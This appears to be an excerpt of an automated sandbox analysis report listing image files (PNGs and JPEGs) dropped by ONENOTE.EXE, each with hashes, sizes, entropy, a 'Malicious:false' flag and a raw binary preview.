                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):7.837610270261933
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                        MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                        SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                        SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                        SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):49224
                                                                                                        Entropy (8bit):7.402134460714453
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                        MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                        SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                        SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                        SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                        Malicious:false
                                                                                                        Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:13:06], progressive, precision 8, 570x779, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):129887
                                                                                                        Entropy (8bit):7.8877849553452695
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:QS1x1rXglsteJ79wHi4vNQR5yBlUdOSILe9hSj9jeWMPjdlOJ:vvglst1HiwWR5yBA2LeS9jd1
                                                                                                        MD5:737E96E41D79D3BDACE7AB4F8CBF6274
                                                                                                        SHA1:E6202A41A4F86B27D9EBCAEF7670B16C0ED67CF2
                                                                                                        SHA-256:7966F3D8A2D61ECB49A35E163781858E052C0B122A18A1238AFE27B57E2850E8
                                                                                                        SHA-512:D398C8521DB2FB3F8456FE792CF37472F3B851DD7298DB20E2DB79144F8E846D051878E77E5EF5D00E6840EDB90C6E2D97935BC1023A15FC45038CCE731E9895
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....iExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:13:06.............................:.......................................................&.(.................................3.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................u.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...W..I:..*....a....Aa ...w.T.M.v.........3x.......8Y....$.."-..m.I.0~sxB[@..=...:..\.Y?....@O.L;9i..U....?.5">+9.s\Z..vN
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):64118
                                                                                                        Entropy (8bit):7.742974333356952
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                        MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                        SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                        SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                        SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):84097
                                                                                                        Entropy (8bit):7.78862495530604
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                        MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                        SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                        SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                        SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12180
                                                                                                        Entropy (8bit):5.318266117301791
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
                                                                                                        MD5:5C859FF69B3A271A9AAB08DFA21E8894
                                                                                                        SHA1:3156302A7450ADFF4D1B6EC893E955D3764D4DD4
                                                                                                        SHA-256:B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
                                                                                                        SHA-512:4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11332
                                                                                                        Entropy (8bit):7.9324721568775285
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                        MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                        SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                        SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                        SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):79656
                                                                                                        Entropy (8bit):7.966459570826366
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                        MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                        SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                        SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                        SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
